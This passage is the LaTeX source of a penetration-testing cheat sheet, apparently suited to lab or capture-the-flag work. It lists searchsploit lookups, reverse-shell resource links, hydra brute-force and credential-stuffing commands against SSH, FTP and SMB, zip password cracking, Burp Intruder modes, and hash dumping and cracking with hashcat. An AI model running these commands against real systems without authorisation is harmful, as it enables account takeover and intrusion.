5 (+ 5) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Searchsploit / Exploit-db}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To search for an exploit on exploit-db} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}Use `\{\{lang-plain\}\}exploit-db` website or `\{\{lang-plain\}\}searchsploit EXPLOIT\_NAME` on terminal} \tn % Row Count 4 (+ 4) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{After search, to get full local path on system for an exploit} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}searchsploit -p EXPLOITDB\_ID`} \tn % Row Count 7 (+ 3) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Reverse shell}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{\seqsplit{https://www.revshells.com/}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{\seqsplit{https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology\%20and\%20Resources/Reverse\%20Shell\%20Cheatsheet.md}} \tn % Row Count 4 (+ 3) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Bruteforce}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Bruteforce password for a username to a service with hydra} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}hydra -l {\bf{username}} -P {\bf{/path/to/passwordlist}} {\bf{service}}://{\bf{ip\_addr}}:{\bf{port}}`\{\{nl\}\}`\{\{lang-plain\}\}hydra -l john -P \seqsplit{/usr/share/john/password.lst} ssh://10.0.0.1:22`} \tn % Row Count 6 (+ 6) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Credential stuffing with hydra} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}hydra -L usernames.txt -P passwords.txt ftp://10.0.0.1:21`} \tn % Row Count 9 (+ 3) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Credential stuffing with hydra using a file with colon seperated "uname:pass" format on multiple targets} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}hydra -C logins.txt -M targets.txt -p 139 smb`} \tn % Row Count 14 (+ 5) % Row 3 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Bruteforce password for a zip file} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}fcrackzip -u -D -p {\bf{/path/to/wordlist}} {\bf{zipfile\_name}}`} \tn % Row Count 17 (+ 3) \hhline{>{\arrayrulecolor{DarkBackground}}-} \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{For bruteforcing web-sites/-apps, use Burp Suite \textgreater{}\textgreater{} Intruder \textgreater{}\textgreater{} Sniper (for password spraying or to try several passwords against a username -{}- ). Use Burp Suite \textgreater{}\textgreater{} Intruder \textgreater{}\textgreater{} Pitchfork (for credential stuffing) or use Burp Suite \textgreater{}\textgreater{} Intruder \textgreater{}\textgreater{} Cluster bomb (for credential stuffing that tries every combination of username/password)} \tn \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Post Exploitation}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{} \tn % Row Count 0 (+ 0) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{x{2.4885 cm} x{2.4885 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{5.377cm}}{\bf\textcolor{white}{~}} \tn % Row 0 \SetRowColor{LightBackground} Dump password hashes of user accounts & `\{\{lang-plain\}\}hashdump` \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} To identify a type of hash & `\{\{lang-plain\}\}hash-identifier` \tn % Row Count 4 (+ 2) % Row 2 \SetRowColor{LightBackground} To crack a hash using hashcat (check \seqsplit{https://hashcat.net/wiki/doku.php?id=hashcat} for {\bf{hash-mode}}) & `\{\{lang-plain\}\}hashcat -m {\bf{hash-mode}} {\bf{digest}} {\bf{/path/to/wordlist}}\{\{nl\}\}hashcat -m 0 cd7350282... wordlist.txt` \tn % Row Count 10 (+ 6) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} % That's all folks \end{multicols*} \end{document}